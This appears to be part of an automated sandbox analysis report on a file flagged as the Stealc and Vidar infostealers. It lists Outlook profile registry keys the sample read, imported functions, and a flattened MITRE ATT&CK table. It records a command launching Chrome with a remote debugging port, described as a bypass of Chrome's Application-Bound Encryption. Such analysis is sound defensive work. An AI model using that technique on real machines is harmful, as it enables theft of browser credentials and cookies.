              Source: C:\Users\user\Desktop\random(1).exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
              Source: C:\Users\user\Desktop\random(1).exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003Jump to behavior
              Source: C:\Users\user\Desktop\random(1).exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004Jump to behavior
              Source: Yara matchFile source: 00000000.00000002.2013235084.0000000000913000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: random(1).exe PID: 7600, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Attempt to bypass Chrome Application-Bound Encryption
              Source: C:\Users\user\Desktop\random(1).exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
              Yara detected Stealc
              Source: Yara matchFile source: 00000000.00000002.2013235084.00000000008BD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1728661894.0000000004BE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2013442010.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: random(1).exe PID: 7600, type: MEMORYSTR
              Source: Yara matchFile source: dump.pcap, type: PCAP
              Yara detected Vidar stealer
              Source: Yara matchFile source: Process Memory Space: random(1).exe PID: 7600, type: MEMORYSTR
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C670C40 sqlite3_bind_zeroblob,0_2_6C670C40
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C670D60 sqlite3_bind_parameter_name,0_2_6C670D60
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C598EA0 sqlite3_clear_bindings,0_2_6C598EA0
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C670B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,0_2_6C670B40
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C596410 bind,WSAGetLastError,0_2_6C596410
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C59C050 sqlite3_bind_parameter_index,strlen,strncmp,strncmp,0_2_6C59C050
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C596070 PR_Listen,0_2_6C596070
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C59C030 sqlite3_bind_parameter_count,0_2_6C59C030
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C5960B0 listen,WSAGetLastError,0_2_6C5960B0
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C5222D0 sqlite3_bind_blob,0_2_6C5222D0
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C5963C0 PR_Bind,0_2_6C5963C0

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
              Command and Scripting Interpreter              		1
              DLL Side-Loading              		2
              Process Injection              		1
              Masquerading              		2
              OS Credential Dumping              		1
              System Time Discovery              		Remote Services1
              Email Collection              		21
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
              DLL Side-Loading              		24
              Virtualization/Sandbox Evasion              		LSASS Memory641
              Security Software Discovery              		Remote Desktop Protocol1
              Archive Collected Data              		1
              Remote Access Software              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
              Disable or Modify Tools              		Security Account Manager24
              Virtualization/Sandbox Evasion              		SMB/Windows Admin Shares4
              Data from Local System              		12
              Ingress Tool Transfer              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
              Process Injection              		NTDS2
              Process Discovery              		Distributed Component Object ModelInput Capture3
              Non-Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Deobfuscate/Decode Files or Information              		LSA Secrets1
              File and Directory Discovery              		SSHKeylogging114
              Application Layer Protocol              		Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
              Obfuscated Files or Information              		Cached Domain Credentials236
              System Information Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
              Software Packing              		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              DLL Side-Loading              		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.